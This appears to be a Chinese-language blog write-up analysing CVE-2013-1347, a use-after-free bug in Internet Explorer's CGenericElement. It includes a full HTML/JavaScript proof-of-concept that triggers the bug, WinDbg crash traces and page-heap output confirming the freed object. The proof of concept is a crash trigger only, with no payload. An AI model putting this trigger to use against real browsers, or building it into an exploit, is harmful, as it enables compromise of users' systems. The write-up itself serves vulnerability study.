CVE-2013-1347-Microsoft IE CGenericElement 释放重引用漏洞

好久没分析漏洞了，《漏洞战争》这本书也停滞了很久了，最近没给自己什么任务，那就分析分析吧，虽然这个看着比较长，看看能不能简便一点。

“水坑”攻击事件

就是黑客入侵了一个目标人群经常访问的网站，并植入攻击代码，成功借刀杀人哈哈

漏洞分析

环境

win7 sp1 32位
windbg
ida

poc

<!doctype html> <!-- required -->
<HTML>
<head>
</head>
<body>
<ttttt:whatever id="myanim"/><!-- required format -->
<script>
    f0=document.createElement('span');
	document.body.appendChild(f0);

	f1=document.createElement('span');
	document.body.appendChild(f1);

	f2=document.createElement('span');
	document.body.appendChild(f2);

	document.body.contentEditable="true";
	f2.appendChild(document.createElement('datalist')); //has to be a data list
	f1.appendChild(document.createElement('table'));    //has to be a table

	try{
	        f0.offsetParent=null;                       //required
	}catch(e){  }

	f2.innerHTML="";                                    //required
	f0.appendChild(document.createElement('hr'));       //required
	f1.innerHTML="";                                    //required
	CollectGarbage();
 </script>
</body>
</html>

ie打开poc，windbg附加，允许阻止的内容

0:013> g
ModLoad: 69b60000 69c12000   C:\Windows\System32\jscript.dll
(e34.660): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=659d017a ebx=004bec08 ecx=0049c2e0 edx=00000000 esi=0268e8f0 edi=00000000
eip=00000000 esp=0268e8c0 ebp=0268e8dc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
00000000 ??              ???
0:005> kv
ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
0268e8bc 65b8c407 65bb5961 0268ec0c 004bec08 0x0
0268e8c0 65bb5961 0268ec0c 004bec08 00000000 mshtml!CElement::Doc+0x7 (FPO: [0,0,0])
0268e8dc 65bb586d 004bec08 0268ec0c 004bec08 mshtml!CTreeNode::ComputeFormats+0xba
0268eb88 65bba12d 004bec08 004bec08 0268eba8 mshtml!CTreeNode::ComputeFormatsHelper+0x44
0268eb98 65bba0ed 004bec08 004bec08 0268ebb8 mshtml!CTreeNode::GetFancyFormatIndexHelper+0x11
0268eba8 65bba0d4 004bec08 004bec08 0268ebc4 mshtml!CTreeNode::GetFancyFormatHelper+0xf
0268ebb8 65a3b9c4 004bec08 0268ebd4 65a3ba2c mshtml!CTreeNode::GetFancyFormat+0x35
0268ebc4 65a3ba2c 00000000 004bec08 0268ebe4 mshtml!ISpanQualifier::GetFancyFormat+0x5a
0268ebd4 65aac009 00000000 0044e908 0268ec1c mshtml!SLayoutRun::HasInlineMbp+0x10
0268ebe4 65abb4e5 00000000 00000000 0044e908 mshtml!SRunPointer::HasInlineMbp+0x56

eip变成了0x00000000，从栈中也看不出什么

开启页堆

gflags.exe /i iexplore.exe +hpa

这时候是mov出的错

0:013> g
ModLoad: 6a640000 6a6f2000   C:\Windows\System32\jscript.dll
(d5c.a94): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=669b5100 ebx=079d2fb0 ecx=082d1fc8 edx=00000000 esi=045eee50 edi=00000000
eip=6663c400 esp=045eee24 ebp=045eee3c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!CElement::Doc:
6663c400 8b01            mov     eax,dword ptr [ecx]  ds:0023:082d1fc8=????????

我们看看这个地址的属性

0:005> !heap -p -a ecx
    address 082d1fc8 found in
    _DPH_HEAP_ROOT @ 151000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    8360b60:          82d1000             2000
    6c3a90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77465674 ntdll!RtlDebugFreeHeap+0x0000002f
    77427aca ntdll!RtlpFreeHeap+0x0000005d
    773f2d68 ntdll!RtlFreeHeap+0x00000142
    7753f1ac kernel32!HeapFree+0x00000014
    664cb9a8 mshtml!CGenericElement::`vector deleting destructor'+0x0000003d
    66647dd0 mshtml!CBase::SubRelease+0x00000022
    6663c482 mshtml!CElement::PrivateRelease+0x0000002a
    6663b034 mshtml!PlainRelease+0x00000025
    6669669d mshtml!PlainTrackerRelease+0x00000014
    6a64a6f1 jscript!VAR::Clear+0x0000005f
    6a666d66 jscript!GcContext::Reclaim+0x000000b6
    6a664309 jscript!GcContext::CollectCore+0x00000123
    6a6c8572 jscript!JsCollectGarbage+0x0000001d
    6a6574ac jscript!NameTbl::InvokeInternal+0x00000141
    6a654ea4 jscript!VAR::InvokeByDispID+0x0000017f
    6a65e3e7 jscript!CScriptRuntime::Run+0x00002b80
    6a655c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    6a655bfb jscript!ScrFncObj::Call+0x0000008d
    6a655e11 jscript!CSession::Execute+0x0000015f
    6a65612a jscript!COleScript::ExecutePendingScripts+0x000001bd
    6a65c2d9 jscript!COleScript::ParseScriptTextCore+0x000002a4
    6a65c0f1 jscript!COleScript::ParseScriptText+0x00000030
    665f68c7 mshtml!CScriptCollection::ParseScriptText+0x00000218
    665f66bf mshtml!CScriptElement::CommitCode+0x000003ae
    665f6c35 mshtml!CScriptElement::Execute+0x000000c6
    665d82b5 mshtml!CHtmParse::Execute+0x0000004a
    665b77cf mshtml!CHtmPost::Broadcast+0x0000000f
    665b7f36 mshtml!CHtmPost::Exec+0x000005f7
    665b8a99 mshtml!CHtmPost::Run+0x00000015
    665b89fd mshtml!PostManExecute+0x000001fb
    665b7c66 mshtml!PostManResume+0x000000f7

我们可以看到in free-ed allocation，这是已经free掉了的，明显的uaf

我们再看看，可以看到mshtml!CGenericElement::vector deleting destructor' ，确实是这个对象的释放后重用